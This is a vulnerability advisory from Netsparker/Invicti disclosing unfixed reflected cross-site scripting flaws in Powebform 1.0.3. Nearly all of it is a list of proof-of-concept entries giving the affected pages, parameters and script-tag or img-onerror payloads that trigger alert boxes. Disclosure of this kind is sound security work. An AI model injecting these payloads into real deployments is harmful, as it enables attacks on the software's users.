Multiple Reflected XSS Vulnerabilities in Powebform 1.0.3

Information

Advisory by Netsparker (now Invicti)
Name: Multiple Reflected XSS Vulnerabilities in Powebform 1.0.3
Affected Software: Powebform 1.0.3
Affected Versions: 1.0.3
Vendor Homepage: https://sourceforge.net/projects/powebform/files/powebform/1.0.3/ 
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not Fixed
Invicti Advisory Reference: NS-17-007

Technical Details

Proof of Concept URL for Cross-site Scripting vulnerabilities in Powebform;

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_fax
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C4A)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: anum_item
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C5E)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_tele
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C42)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_post
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C3E)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add4
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C3A)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add1
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C0A)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add3
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C36)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C32)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: budget
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000BFA)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: dept
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0009C2)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_name
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C02)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: name
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000762)</scRipt>

URL: /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>

URL: /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: quant_1
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: quant_3
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: quant_2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000276)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: code_3
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00027A)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: code_2
Parameter Type: POST
Attack Pattern: "><iMg src=N onerror=alert(9)>

URL: /powebform-1.0.3/page2.php
Parameter Name: code_1
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C34)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: cost_1
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C40)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: cost_3
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000291)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: cost_2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000278)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: shipping
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000292)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: descrip_1
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: descrip_2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000274)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: descrip_3
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>

URL: /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>

For more information on cross-site scripting vulnerabilities, see Cross-site Scripting (XSS).

Advisory Timeline

08 Feb 2017 – Advisory released

Solution

No solution is available at the time of publishing this advisory.

Credits & Authors

This issue has been discovered by Enes Aslanbakan while testing Invicti Web Application Security Scanner.

About Invicti

IInvicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.